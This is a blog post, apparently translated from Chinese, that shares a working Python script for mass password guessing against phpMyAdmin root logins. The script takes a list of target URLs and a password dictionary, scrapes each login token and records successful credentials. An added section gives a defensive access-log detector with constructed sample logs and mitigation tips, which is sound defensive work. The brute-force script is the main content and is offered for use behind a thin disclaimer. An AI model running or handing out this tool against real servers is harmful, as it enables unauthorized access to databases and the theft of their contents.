Python Script | phpMyAdmin Bulk Password Guessing

It's been a while since I posted an article. This is something I tinkered with earlier, dug out here to keep a record of it.

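Intent: enumerate passwords for the root user only. Other database users have too few privileges and are hard to make use of, and phpMyAdmin is just one avenue in a real engagement, so targeting the root user alone is sufficient.
You need to prepare the known phpMyAdmin admin-panel URLs in advance; you can collect specific URLs first and put them in url.txt, and have the enumeration dictionary ready.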

#coding=utf-8
import requests
from bs4 import BeautifulSoup as bp
def attack(url,username,password):
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"}
    session=requests.session()
    try:
        response=session.get(url,headers=headers)
        soup=bp(response.text,"lxml")
        my_Dict={"type":"hidden","name":"token"}
        tiqu=soup.find(attrs=my_Dict)
        data={}
        data["token"]=tiqu.get("value",0)
        if data==0:
            return "no token"
        data['pma_username']=username
        data['pma_password']=password
        index_url=url+"index.php"
        response1=session.post(url=index_url,data=data)
        htmls=response1.text
        if "phpMyAdmin is more friendly with a " in htmls:
            print("[+] 爆破猜解成功! username:{0}, password:{1}".format(username,password))
            with open("success.txt",'a') as results:
                results.write("{0}|{1}|{2}".format(url,username,password))
                results.write('\n')
            return True
        else:
            return False
            pass
    except Exception as e:
        pass
if __name__=='__main__':
    try :
        with open('./url.txt','r') as urls:
            host_t=urls.readlines()
            for url in host_t:
                if url[-1]=='\n':
                    url=url[:-1]
                if requests.get(url).status_code!=200:
                    continue
                username="root"
                with open("password.txt","r") as passwd:
                    passwords=passwd.readlines()
                for password in passwords:
                    print("attack {0} use username:{1}|password:{2}".format(url,username,password))
                    if attack(url,username,password):
                        break
    except Exception as e1:
        pass
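
Seen from the server side, the script above leaves a recognisable trace in access logs: one POST to index.php per guess, and because only the token-fetching GET carries the Chrome User-Agent, the POSTs go out with the requests library default. The detector below is an added example, not part of the original post; the log lines, IP addresses, threshold and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined Log Format: ip - - [time] "METHOD path proto" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def find_pma_guessing(lines, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: [reasons]} for clients whose phpMyAdmin login traffic looks scripted."""
    posts = defaultdict(list)   # ip -> timestamps of login POSTs
    agents = defaultdict(set)   # ip -> User-Agent strings seen on phpMyAdmin paths
    for line in lines:
        m = LINE_RE.match(line)
        if not m or "phpmyadmin" not in m["path"].lower():
            continue
        agents[m["ip"]].add(m["ua"])
        if m["method"] == "POST" and m["path"].split("?")[0].endswith("/index.php"):
            posts[m["ip"]].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
    findings = {}
    for ip, stamps in posts.items():
        stamps.sort()
        reasons = []
        # Sliding window: `threshold` login POSTs that all fall inside `window`
        for i in range(len(stamps) - threshold + 1):
            if stamps[i + threshold - 1] - stamps[i] <= window:
                reasons.append("login-post-burst")
                break
        # Browser User-Agent on some requests, library default on others
        if len(agents[ip]) > 1 and any(u.startswith("python-requests/") for u in agents[ip]):
            reasons.append("mixed-user-agent")
        if reasons:
            findings[ip] = reasons
    return findings

def sample_log():
    # Constructed access-log lines: one scripted client, one ordinary admin login
    chrome = "Mozilla/5.0 (Windows NT 10.0; WOW64) Chrome/64.0.3282.186"
    fmt = '{ip} - - [10/Mar/2024:10:00:{s:02d} +0000] "{m} /phpmyadmin/{p} HTTP/1.1" 200 512 "-" "{ua}"'
    log = []
    for s in range(0, 12, 2):
        log.append(fmt.format(ip="203.0.113.7", s=s, m="GET", p="", ua=chrome))
        log.append(fmt.format(ip="203.0.113.7", s=s + 1, m="POST", p="index.php", ua="python-requests/2.31.0"))
    log.append(fmt.format(ip="198.51.100.20", s=30, m="GET", p="", ua=chrome))
    log.append(fmt.format(ip="198.51.100.20", s=31, m="POST", p="index.php", ua=chrome))
    return log

if __name__ == "__main__":
    print(find_pma_guessing(sample_log()))
```

The same two signals can feed a rate limit or a fail2ban-style block on the phpMyAdmin login path; restricting that path to trusted source addresses removes the exposure entirely.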

Acknowledgements:

langzi.fun
xingqingsafe.github.io

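I'm still a beginner and not yet up to using multithreading or more advanced techniques; discussion, ideas and corrections are welcome! For security research use only; do not use it for illegal purposes, and any consequences are your own responsibility!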

2 comments

    • That's someone else's wheel I rebuilt a while back; there's still a lot to learn, so keep up the good work!